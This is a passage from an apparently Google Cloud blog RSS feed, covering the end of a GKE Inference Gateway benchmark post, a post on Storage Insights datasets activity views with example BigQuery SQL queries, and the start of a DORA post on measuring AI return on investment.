&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;30.20 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;81.03 ms&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;62.6% lower ITL&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 4: GKE with GKE Inference Gateway delivered superior AI inference compared to a third-party managed Kubernetes service using standard HTTP LB.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to accelerate your gen AI inference workloads?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you’re deploying inference workloads such as real-time customer support agents, dynamic coding assistants, or sub-second fraud detection models, infrastructure latency dictates your user experience. By ensuring shared prompt prefixes hit the active cache nearly 100% of the time, GKE Inference Gateway transforms your LLMs from sluggish, expensive reasoning engines into rapid, capital-efficient, production-grade powerhouses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to explore the performance advantage that GKE Inference Gateway can bring to your gen AI workloads? Access the full benchmark report &lt;/span&gt;&lt;a href="https://www.principledtechnologies.com/Google/GKE-Inference-Gateway-study-0526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and watch this explainer &lt;/span&gt;&lt;a href="https://youtu.be/RXX-LouimPY?si=dPGbP91TakSonOq9" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;video&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to learn more.&lt;/span&gt;&lt;/p&gt;
&lt;hr/&gt;
&lt;p&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;A special thanks to Dan Sullivan, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Senior Performance Architect&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, Principled Technologies.&lt;/span&gt;&lt;/em&gt;&lt;/sup&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/containers-kubernetes/gke-inference-gateway-prefix-caching-accelerates-ai-inference/</guid><category>Networking</category><category>AI &amp; Machine Learning</category><category>AI infrastructure</category><category>GKE</category><category>Containers &amp; Kubernetes</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Report: GKE Inference Gateway delivers up to 92% faster AI responses</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/containers-kubernetes/gke-inference-gateway-prefix-caching-accelerates-ai-inference/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bob Tian</name><title>Software Engineer</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Susan Wu</name><title>Outbound Product Manager</title><department></department><company></company></author></item><item><title>Storage Insights datasets: Enabling org-wide operational discovery with activity insights</title><link>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As enterprise storage footprints scale to billions of objects, AI applications and agentic workloads are fundamentally shifting the role of storage from a passive repository to the foundation of the data platform. This is driven by a surge in unstructured model data and the billions of actions performed on those objects, including session logs and audit trails. To manage this and answer questions about cost, operations, and security, storage and platform admins need to go beyond knowing what data they have, to understanding exactly how it is being accessed, moved, and modified. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help, we're excited to announce activity insights within &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/insights/datasets"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Insights datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Now generally available, these new views provide visibility into the operational details of your Google Cloud Storage assets, enabling data-driven cost optimization and faster troubleshooting. For example, with activity insights, you can answer questions like:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Are my objects located in the right storage classes within my buckets?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;What regions is my bucket interacting with the most so I can assess if it is optimally located?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Where are there errors across operations on my storage estate and why?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Answering these questions confidently is the key to unlocking cost optimizations and reclaiming engineering time. Storage Insights datasets&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, a feature of &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/storage-intelligence/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Cloud Storage&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, provides daily metadata and frequent activity insights (typically within four hours of the activity) so you have better visibility into your storage estate. While Storage Intelligence is a unified management product with capabilities like &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/bucket-relocation/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Bucket relocation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/batch-operations/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Batch operations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/storage/docs/analyze-data-gemini-cloud-assist"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Cloud Assist&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, this blog focuses on how you can leverage Storage Insights datasets for operational optimization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What are Storage Insights datasets?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; deliver an automated, query-ready BigQuery index of your entire storage estate, complete with raw metadata and activity insights, replacing manual, error-prone data collection. Storage Insights datasets can be customized in scope: create a dataset for your entire org, a specific folder, a project, or a set of projects, or even specific buckets. The dataset then refreshes with regular updates, giving you a comprehensive view of your storage.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;From static metadata to live intelligence&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets are your go-to tool for understanding your storage &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;metadata&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, acting as an inventory management tool, scanning object metadata (storage class, location, age, custom metadata) and organizing it into a powerful, queryable BigQuery-linked dataset. This is crucial for knowing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;what&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; data you have (learn more about how to optimize storage spend with Storage Insights datasets &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/storage-insights-datasets-optimizes-storage-footprint?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But what if you also knew &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;how and when&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that data is being used?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Storage Insights datasets now offers a set of new views that capture: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Object-level activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including writes, updates, deletes, and errors&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Bucket-level aggregate activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including total object operations, a breakdown by type of operations, total errors and most active prefixes&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Bucket-level regional traffic activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including ingress and egress bytes per region that interact with your bucket&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Project-level aggregate activity,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; including total object operations, a breakdown by type of operations and total errors&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This data flows directly into new BigQuery views within your dataset so you can run analytics queries for specific insights, interact with the data via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/gemini-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or simply connect it to powerful &lt;/span&gt;&lt;a href="https://bit.ly/si-template" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Looker dashboards&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for visualization. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This moves you from a static snapshot to a dynamic, queryable analysis of your data's entire lifecycle. It's the difference between knowing &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what's&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; in your warehouse and knowing &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;what’s used &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;and &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;when&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Three ways to use activity insights immediately&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s what you can do, starting today, with activity insights in Storage Intelligence datasets.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Right-size your storage estate&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You have terabytes of data in Standard or Nearline class storage that you &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;believe&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; is cold. But without proof, moving it to Coldline or Archive class is risky. What if a critical process still needs to read it once per quarter?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; With the new Storage Intelligence views that surface activity insights, you can now identify buckets that have had minimal read/write activity over the last 30, 60, or 90 days.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Apply or fine-tune lifecycle policies to transition this data to more cost-effective storage classes. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to order all the buckets in your estate with little to no activity in the last six months:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT name, location, project, totalRequests\r\nFROM\r\n  `[project]`.`[dataset]`.`bucket_activity_view`\r\nWHERE\r\n  snapshotEndTime &amp;gt;= TIMESTAMP(DATE_SUB(DATE_TRUNC(CURRENT_DATE(), MONTH), INTERVAL 5 MONTH))\r\n  AND snapshotEndTime &amp;lt; CURRENT_TIMESTAMP()\r\nORDER BY totalRequests ASC\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0e61130&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Architect for global performance with data-driven bucket placement&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your team set up a multi-region bucket to serve a global application. But a year later, is that still the right architecture? What if 99% of your traffic is now coming from a single region?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyze the access patterns in your new bucket_region_activity_view table. You can easily pinpoint which regions are driving read and write activity for the bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Make data-driven decisions to co-locate your bucket with your compute. You might find that changing a multi-region bucket to a single-region one (or vice-versa) can lead to significant cost-savings and even improve performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to break down the egress and ingress traffic pattern for a bucket across regions: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  requestLocation,\r\n  bucketLocation,\r\n  SUM(requestBytes) AS total_request_bytes,\r\n  SUM(responseBytes) AS total_response_bytes\r\nFROM\r\n  `[project]`.`[dataset]`.`bucket_region_activity_view` \r\nWHERE\r\n  name = &amp;#x27;[bucket name]&amp;#x27;\r\nGROUP BY\r\n  requestLocation,\r\n  bucketLocation;\r\n\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0e61fd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shipt&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a retail technology platform and same-day delivery service, has been using Storage Intelligence capabilities to inform their data location decisions: &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“Storage Intelligence enables us to efficiently manage over 2 billion objects, delivering cost and performance optimization. With Insights datasets, we detected and analyzed egress charges from multi-region buckets, identifying opportunities to improve efficiency by co-locating compute and storage. By leveraging the Bucket Relocate capability, we seamlessly moved 1.3 Petabytes of data from multi-region to regional storage, achieving substantial cost savings while maintaining uninterrupted application performance and data pipeline continuity.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;-&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Ron Cuirle, Director of Engineering - Cloud Platforms, Shipt&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Demystify and resolve operational hotspots &lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your team sees a spike in 429 (too many requests) errors. In a massive environment, this is rarely just a performance hiccup — it’s expensive! These errors trigger automatic retries, which often lead to a cycle of high-frequency, billable operations that drive up your Class A costs. Pinpointing exactly which object or prefix is causing this can be a time-consuming troubleshooting nightmare.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The new Storage Insights datasets views provide granular details on these errors, right in BigQuery. You can query for 429 errors and see exactly which objects and prefixes are under pressure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The outcome:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Additionally, you can pinpoint the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;cause&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; of your 429 errors, moving your team from troubleshooting to resolution.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, here’s a SQL query to analyze 429s occurring across your estate, where they are happening and why: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT\r\n  requestOperation,\r\n  errorReason,\r\n  objectName,\r\n  bucketName,\r\n  requestCompletionTimestamp,\r\n  project\r\nFROM\r\n  `[project]`.`[dataset]`.`object_events_view` \r\nWHERE\r\n  responseStatus = 429\r\nORDER BY\r\n  requestCompletionTimestamp DESC;\r\n\r\n\r\n//Running queries in Datasets accrues BQ query costs, refer to the pricing page for further details.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d0e61b50&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As your organization grows with Google Cloud, the scale of your data will only increase. Stop relying on archival data and start optimizing your organization’s storage estate. Cloud Storage Storage Insights datasets with activity insights turn massive data estates from  complex operational challenges into clearly understood, highly optimized assets.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To get started, check out use our pre-configured Looker Studio template &lt;/span&gt;&lt;a href="https://lookerstudio.google.com/c/u/0/reporting/670eee3f-ad6d-45ea-a169-853ab023dc84/page/p_k94oydxikd" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to connect to your dataset for quick analysis and value: &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example: View the trend for Total Reads on your bucket over time&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_hJhCdWP.max-1000x1000.png"
        
          alt="1"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Or, analyze the ingress and egress traffic patterns for your bucket: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_G8F8tZ4.max-1000x1000.png"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to turn insight into action?&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/storage-intelligence/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today in the Google Cloud console.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/insights/datasets"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Configure your dataset today&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and query your data directly in BigQuery or &lt;/span&gt;&lt;a href="https://bit.ly/si-template" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;connect to our Looker template&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for quick and easy visualization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Reference our videos for more information on &lt;/span&gt;&lt;a href="https://youtu.be/3makK6m8sIw?si=-BjdpU2ErtZGXwSA" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://youtu.be/r5Z_z1bgcw0?si=mkFxaY939Tkq9p6A" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;How to Get Started&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Read more about how to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/storage-insights-datasets-optimizes-storage-footprint?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;optimize your Cloud Storage footprint with Storage Insights datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</guid><category>Storage &amp; Data Transfer</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Storage Insights datasets: Enabling org-wide operational discovery with activity insights</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Misha Sheth</name><title>Product Manager, Storage</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Kumar Nachiketa</name><title>APAC Technology Practice Lead, Storage</title><department></department><company></company></author></item><item><title>How to unlock true ROI in software development – a deep dive into the latest DORA research</title><link>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;How do you prove the business value of generative AI to your teams? &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Technology and finance leaders need to show the clear business value of AI projects to secure ongoing funding. While measuring return on investment (ROI) is a key part of validating your technical strategy, long-term success ultimately depends on building the organizational systems and culture needed to make AI work.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you evaluate the costs and business benefits of AI, we recently shared the DORA: &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/dora-roi-of-ai-assisted-software-development?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;ROI of AI-assisted software development report&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This research offers a practical approach to help your team work through early adoption challenges, align engineering plans, and drive business growth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are the key findings from the report, and how you can use them to support your overall technology strategy.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #1: Navigating the J-curve of AI value realization&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is important to be realistic about how quickly you will see a return on your AI investments. While AI can act as a powerful amplifier for software engineering, the path to financial value is rarely a straight line. Most organizations will instead encounter a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;J-curve&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: a temporary productivity dip and period of instability associated with early adoption.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This temporary drop is a normal part of adopting new technology, rather than a sign of a failing strategy. The report points to three main reasons why this happens: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
